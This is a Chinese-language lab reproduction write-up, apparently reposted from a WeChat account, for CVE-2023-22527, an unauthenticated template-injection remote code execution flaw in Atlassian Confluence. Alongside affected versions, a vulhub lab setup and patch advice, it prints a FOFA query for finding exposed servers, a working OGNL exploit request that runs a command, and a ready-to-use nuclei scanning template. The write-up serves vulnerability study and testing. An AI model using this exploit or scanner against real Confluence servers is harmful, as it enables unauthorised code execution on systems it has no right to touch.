[漏洞复现]CVE-2023-22527

admin 2024年2月11日15:32:44评论56 views字数 2964阅读9分52秒阅读模式

使

01

漏洞名称

Atlassian Confluence 模板注入代码执行漏洞

02

漏洞影响

影响范围

Atlassian Confluence Data Center and Server 8.0.x

Atlassian Confluence Data Center and Server 8.1.x

Atlassian Confluence Data Center and Server 8.2.x

Atlassian Confluence Data Center and Server 8.3.x

Atlassian Confluence Data Center and Server 8.4.x

Atlassian Confluence Data Center and Server 8.5.0-8.5.3

安全版本

Atlassian Confluence Data Center and Server 8.5.4

Atlassian Confluence Data Center 8.6.0

Atlassian Confluence Data Center 8.7.1

03

漏洞描述

Atlassian Confluence 是由 Atlassian 开发的企业级协作软件。2024年1月16日,Atlassian 官方披露 CVE-2023-22527 Atlassian Confluence 模板注入代码执行漏洞。攻击者可在无需登录的情况下构造恶意请求导致远程代码执行。Atlassian 官方评级严重,外界尚未流传相关利用。请Atlassian Confluence客户尽快升级。

04

FOFA搜索语句
app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"

[漏洞复现]CVE-2023-22527

互联网暴露面不算大,但内网中数量是相当可观的。

05

靶场搭建

下载vulhub源码

https://github.com/vulhub/vulhub

将源码上传到靶场虚拟机,解压并修改名称

unzip vulhub-master.zipmv vulhub-master vulhub

然后进入漏洞对应目录

cd vulhub/confluence/CVE-2023-22527

启动容器

docker compose up -d

[漏洞复现]CVE-2023-22527

经过漫长的等待之后,安装完成查看容器,是有两个容器

[漏洞复现]CVE-2023-22527

访问

http://your-ip:8090

[漏洞复现]CVE-2023-22527

安装完之后需要按照提示申请一个license,按照安装向导配置数据库信息

[漏洞复现]CVE-2023-22527

[漏洞复现]CVE-2023-22527

[漏洞复现]CVE-2023-22527

06

漏洞复现

向靶场发送如下数据包

POST /template/aui/text-inline.vm HTTP/1.1Host: localhost:8090Accept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedlabel=u0027%2b#requestu005bu0027.KEY_velocity.struts2.contextu0027u005d.internalGet(u0027ognlu0027).findValue(#parameters.x,{})%2bu0027&[email protected]@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

[漏洞复现]CVE-2023-22527

漏洞复现成功

07

nuclei poc

poc文件内容如下

id: CVE-2023-22527info:  name: Atlassian Confluence 模板注入代码执行漏洞  author: fgz  severity: critical  description: Atlassian Confluence 是由 Atlassian 开发的企业级协作软件。2024年1月16日,Atlassian 官方披露 CVE-2023-22527 Atlassian Confluence 模板注入代码执行漏洞。攻击者可在无需登录的情况下构造恶意请求导致远程代码执行。Atlassian 官方评级严重,外界尚未流传相关利用。请Atlassian Confluence客户尽快升级。  metadata:    max-request: 1    fofa-query: app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"    verified: truerequests:  - raw:      - |+        POST /template/aui/text-inline.vm HTTP/1.1        Host: {{Hostname}}        Accept-Encoding: gzip, deflate, br        Accept: */*        Accept-Language: en-US;q=0.9,en;q=0.8        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36        Connection: close        Cache-Control: max-age=0        Content-Type: application/x-www-form-urlencoded        Content-Length: 285        label=u0027%2b#requestu005bu0027.KEY_velocity.struts2.contextu0027u005d.internalGet(u0027ognlu0027).findValue(#parameters.x,{})%2bu0027&[email protected]@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(header, 'X-Cmd-Response')"

运行POC

nuclei.exe -u http://192.168.40.130:8090/ -t mypoc/cve/CVE-2023-22527.yaml

[漏洞复现]CVE-2023-22527

08

修复建议

1、官方已经发布安全更新,建议升级至最新版本。

2、利用安全组功能设置其仅对可信地址开放。

09

原文始发于微信公众号(AI与网安):[漏洞复现]CVE-2023-22527

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月11日15:32:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [漏洞复现]CVE-2023-22527https://cn-sec.com/archives/2488010.html

发表评论

匿名网友 填写信息